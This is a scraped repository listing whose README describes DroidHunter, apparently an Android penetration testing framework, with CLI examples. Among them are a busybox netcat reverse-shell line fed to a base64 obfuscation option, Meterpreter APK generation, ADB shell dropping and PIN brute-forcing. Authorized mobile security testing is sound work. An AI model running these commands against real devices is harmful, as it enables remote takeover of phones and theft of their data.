[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-76211":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":13,"stars7d":15,"stars30d":16,"stars90d":14,"forks30d":14,"starsTrendScore":17,"compositeScore":18,"rankGlobal":9,"rankLanguage":9,"license":19,"archived":20,"fork":20,"defaultBranch":21,"hasWiki":22,"hasPages":20,"topics":23,"createdAt":9,"pushedAt":9,"updatedAt":24,"readmeContent":25,"aiSummary":26,"trendingCount":14,"starSnapshotCount":14,"syncStatus":27,"lastSyncTime":28,"discoverSource":29},76211,"DroidHunter","hexsecteam\u002FDroidHunter","hexsecteam","DroidHunter is a CLI-based Android security assessment framework for authorized testing, featuring ADB device management, APK analysis, network checks, vulnerability scanning, reporting, and remote control tools.",null,"Python",135,34,1,0,14,76,5,61.23,"MIT License",false,"main",true,[],"2026-06-12 04:01:21","\u003Cdiv align=\"center\">\n\n# 👻 DroidHunter\n### DroidHunter — Android Security Assessment \u002F Penetration Testing Framework\n\n**Author:** HexSecTeam | Instagram: [@hexsecteam](https:\u002F\u002Fwww.instagram.com\u002Fhexsecteam)\n\n![Version](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FVersion-2.0.0-blueviolet?style=for-the-badge)\n![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FPython-3.8+-cyan?style=for-the-badge&logo=python)\n![Platform](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FPlatform-Linux%20%7C%20macOS-magenta?style=for-the-badge)\n![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-Educational-red?style=for-the-badge)\n\n[![X](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FX-hexsecteam-000000?style=for-the-badge&logo=x&logoColor=white)](https:\u002F\u002Fx.com\u002Fhexsecteam)\n[![Instagram](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FInstagram-hexsecteam-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https:\u002F\u002Fwww.instagram.com\u002Fhexsecteam)\n[![Facebook](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FFacebook-hexsecteam-1877F2?style=for-the-badge&logo=facebook&logoColor=white)](https:\u002F\u002Fwww.facebook.com\u002Fhexsecteam)\n[![YouTube](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FYouTube-hex__sec-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https:\u002F\u002Fwww.youtube.com\u002F@hex_sec)\n[![Telegram Group](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FTelegram-Group-26A5E4?style=for-the-badge&logo=telegram&logoColor=white)](https:\u002F\u002Ft.me\u002Fhexsec_tools)\n[![Telegram Contact](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FTelegram-Contact-26A5E4?style=for-the-badge&logo=telegram&logoColor=white)](https:\u002F\u002Ft.me\u002FHexsecteam)\n\n> ⚠️ **For authorized security testing and educational purposes only.**\n\n\u003C\u002Fdiv>\n\n---\n\n## 💜 Support DroidHunter\n\nIf DroidHunter helps your Android security research, education, or workflow, you can support the project with a small donation.\n\n| Asset | Network | Address |\n|---|---|---|\n| USDT | Ethereum network (ERC-20) | `0x3E79B73e3ce33c6B860425DCB40c6D2f4F2aC508` |\n\n> ⚠️ Only send USDT on the Ethereum network (ERC-20). Sending funds on another network may result in permanent loss.\n\n---\n\n## 📌 Overview\n\n**DroidHunter** is a comprehensive, CLI-based Android security assessment framework targeting ethical hackers and professional penetration testers. It integrates multiple attack surfaces into a single tool with a hacker-aesthetic terminal interface.\n\nDroidHunter is developed by HexSec Team \u002F HexSec Community for authorized Android security assessment, education, and professional penetration testing workflows.\n\n---\n\n## 🖼️ Preview\n\n![DroidHunter Preview](assets\u002Fdroidhunter-preview.png)\n\n> Add your screenshot as `assets\u002Fdroidhunter-preview.png`.\n\n---\n\n## 🚀 Features\n\n| Module | Description |\n|---|---|\n| 📱 **Device Manager** | List devices, device info, manual\u002Fauto ADB WiFi, screenshot, logcat, file transfer |\n| 🔎 **APK Analyzer** | Static decomposition: permissions, secrets, exported components, CVEs |\n| 🌐 **Network Scanner** | Fast port scan, WiFi info, subnet discovery, MitM guide |\n| 🚨 **Vulnerability Scanner** | CVE mapping, root detection, insecure storage, WebView, task hijacking |\n| 💥 **Exploit Engine** | Activity launch, broadcast trigger, content provider dump, deep link fuzzer, shell dropper |\n| 🎯 **Payload Generator** | msfvenom APK, reverse shell one-liners, ADB exploit scripts, obfuscation |\n| 📋 **Report Generator** | Dark-themed HTML report + JSON + CLI table with remediation advice |\n| 🎛️ **Remote Control** | Open Remote Screen via scrcpy from the interactive menu |\n\n---\n\n## ⚙️ Installation\n\n```bash\n# 1. Clone \u002F navigate to the tool directory\ncd \u002Fpath\u002Fto\u002Fdroidhunter\n# or\ngit clone https:\u002F\u002Fgithub.com\u002Fhexsecteam\u002FDroidHunter.git\n\n#2. create a virtual environment\npython -m venv venv \nsource venv\u002Fbin\u002Factivate\n\n# 3. Install Python dependencies\npip3 install -r requirements.txt\n\n# 4. (Optional) Install ADB\nsudo apt install adb       # Debian\u002FUbuntu\nsudo pacman -S android-tools  # Arch\n\n# 5. (Optional for Remote Control) Install scrcpy\nsudo apt install scrcpy\n\n# 6. (Optional for payload generation) Install Metasploit\n# https:\u002F\u002Fdocs.metasploit.com\u002Fdocs\u002Fusing-metasploit\u002Fgetting-started\u002Fnightly-installers.html\n```\n\n---\n\n## 🖥️ Usage\n\n### Interactive Mode (Recommended)\n```bash\npython3 droidhunter.py\n# or\npython3 droidhunter.py --interactive\n```\n\nThe interactive Remote Control menu supports **Open Remote Screen** through `scrcpy` for Android screen mirroring.\n\nDroidHunter supports both **Manual ADB WiFi Connect** and **Auto ADB WiFi Connect** from the interactive menu. Auto ADB WiFi Connect requires the phone to be connected by USB first, USB Debugging enabled, and both devices on the same WiFi network.\n\n### CLI Mode\n```bash\n# List connected devices\npython3 droidhunter.py --devices\n\n# Full device info\npython3 droidhunter.py --device ABC123 --info\n\n# Analyze APK + generate HTML report\npython3 droidhunter.py --apk target.apk --report html --target-name \"com.example.app\"\n\n# Port scan device\npython3 droidhunter.py --device ABC123 --port-scan\n\n# Full vulnerability scan\npython3 droidhunter.py --device ABC123 --vuln-scan --pkg com.example.app\n\n# Check for CVEs based on Android version\npython3 droidhunter.py --device ABC123 --cve-check\n\n# Check if device is rooted\npython3 droidhunter.py --device ABC123 --root-check\n\n# Capture logcat (200 lines)\npython3 droidhunter.py --device ABC123 --logcat 200\n\n# Capture screenshot\npython3 droidhunter.py --device ABC123 --screenshot\n\n# Enable ADB over WiFi\npython3 droidhunter.py --device ABC123 --adb-wifi\n\n# WiFi info\npython3 droidhunter.py --device ABC123 --wifi-info\n\n# SSL pinning check\npython3 droidhunter.py --device ABC123 --ssl-pinning com.example.app\n\n# MitM proxy setup guide\npython3 droidhunter.py --mitm-guide\n\n# Launch exported activity\npython3 droidhunter.py --device ABC123 --exploit activity \\\n  --pkg com.example.app --activity com.example.app.DebugActivity\n\n# Deep link fuzzer\npython3 droidhunter.py --device ABC123 --exploit deep-link \\\n  --pkg com.example.app --scheme myapp\n\n# Drop reverse shell via ADB\npython3 droidhunter.py --device ABC123 --exploit shell-drop \\\n  --lhost 192.168.1.100 --lport 4444\n\n# Generate msfvenom APK payload\npython3 droidhunter.py --payload reverse_tcp \\\n  --lhost 192.168.1.100 --lport 4444 --payload-out evil.apk\n\n# Generate reverse shell one-liners\npython3 droidhunter.py --payload reverse-shells \\\n  --lhost 192.168.1.100 --lport 4444\n\n# Obfuscate a command\npython3 droidhunter.py --payload obfuscate \\\n  --raw-payload \"busybox nc 10.0.0.1 4444 -e \u002Fsystem\u002Fbin\u002Fsh\" \\\n  --obfuscate-method base64\n\n# Pull file from device\npython3 droidhunter.py --device ABC123 --pull \u002Fsdcard\u002Fsecret.txt\n\n# Push file to device\npython3 droidhunter.py --device ABC123 --push malware.apk \u002Fsdcard\u002Fmalware.apk\n\n# Discover live hosts on subnet\npython3 droidhunter.py --discover 192.168.1\n\n# Generate JSON + HTML report\npython3 droidhunter.py --apk app.apk --device ABC123 --vuln-scan \\\n  --pkg com.example --report both --target-name \"Example Corp App\"\n```\n\n---\n\n## 🧩 Module Details\n\n### APK Analyzer\n- **Permission audit** — flags 30+ dangerous Android permissions by severity (CRITICAL → LOW)\n- **Hardcoded secrets** — scans DEX, XML, JSON, JS for API keys, passwords, AWS keys, Firebase configs, DB URLs\n- **Exported components** — activities, services, receivers, providers\n- **File hashes** — MD5, SHA1, SHA256\n- **Obfuscation detection**, native libraries, embedded URLs & IPs\n- **Vulnerability heuristics** — debuggable flag, backup enabled, no network security config\n\n### Vulnerability Scanner\n- **CVE Mapping** — 30+ CVEs mapped to Android SDK levels (Stagefright, BlueBorne, StrandHogg, BlueFrag, etc.)\n- **Root detection** — su binary, Magisk, SuperSU, debuggable build\n- **Frida detection** — checks running processes for Frida server\n- **Insecure data storage** — SharedPreferences, SQLite, world-readable files\n- **WebView checks** — JS enabled, file:\u002F\u002F access\n- **Task hijacking** — StrandHogg-style taskAffinity check\n\n### Exploit Engine\n| Module | Description |\n|---|---|\n| Activity Launch | Launch exported activities without permission |\n| Broadcast Trigger | Send malicious broadcast intents |\n| Content Provider | Dump arbitrary content provider data |\n| Deep Link Fuzzer | Fuzz 20+ deep link paths for unprotected endpoints |\n| Frida Injection | Step-by-step Frida\u002Fobjection injection guide |\n| Reverse Shell Drop | Push & execute busybox\u002Fnc reverse shell via ADB |\n| DB Extractor | Pull SQLite databases from app data directory |\n| Lock Bypass | PIN brute force via ADB keyevents |\n\n### Payload Generator\n| Type | Description |\n|---|---|\n| `reverse_tcp` | msfvenom Android Meterpreter reverse TCP APK |\n| `reverse_https` | msfvenom HTTPS reverse shell APK |\n| `reverse-shells` | 6 reverse shell one-liners (nc, bash, python3, perl, socat) |\n| `adb-script` | Full ADB exploitation shell script |\n| `obfuscate` | Base64 or hex payload obfuscation |\n\n---\n\n## 📋 Report Output\n\nDroidHunter generates:\n- **HTML Report** — dark glassmorphism theme, severity badges, finding cards with CVE links and remediation advice\n- **JSON Report** — structured machine-readable output\n- **CLI Table** — quick terminal summary sorted by severity (CRITICAL → LOW)\n\n---\n\n## 🔧 Requirements\n\n| Requirement | Purpose |\n|---|---|\n| Python 3.8+ | Runtime |\n| `rich` | Terminal UI |\n| `requests` | HTTP checks |\n| ADB (optional) | Device interaction |\n| scrcpy (optional) | Remote Android screen mirroring |\n| Metasploit (optional) | APK payload generation |\n| Frida (optional) | Runtime instrumentation |\n| mitmproxy (optional) | Traffic interception |\n\n---\n\n## ⚠️ Legal Disclaimer\n\n> DroidHunter is intended **exclusively** for authorized security assessments, CTF competitions, and educational research.\n> \n> **Unauthorized use of this tool against systems you do not own or have explicit written permission to test is illegal** under the Computer Fraud and Abuse Act (CFAA), Computer Misuse Act, and equivalent laws in most jurisdictions.\n> \n> The author **HexSecTeam** and contributors assume **no liability** for any misuse or damage caused by this tool.\n\n---\n\n\u003Cdiv align=\"center\">\n  Made with 💜 by \u003Cstrong>HexSecTeam\u003C\u002Fstrong> | HexSec Community\n\u003C\u002Fdiv>\n","DroidHunter 是一个基于命令行的Android安全评估框架，专为授权测试设计。它集成了ADB设备管理、APK分析、网络检查、漏洞扫描、报告生成和远程控制工具等功能。使用Python编写，支持Linux和macOS平台，具有强大的静态APK分析能力，能够检测权限、秘密信息、导出组件及CVEs；同时提供快速端口扫描、WiFi信息获取、子网发现等网络扫描功能，并能进行CVE映射、root检测、不安全存储等多种漏洞扫描。适用于需要对Android应用进行全面安全评估与渗透测试的专业场景。",2,"2026-06-11 03:54:46","CREATED_QUERY"]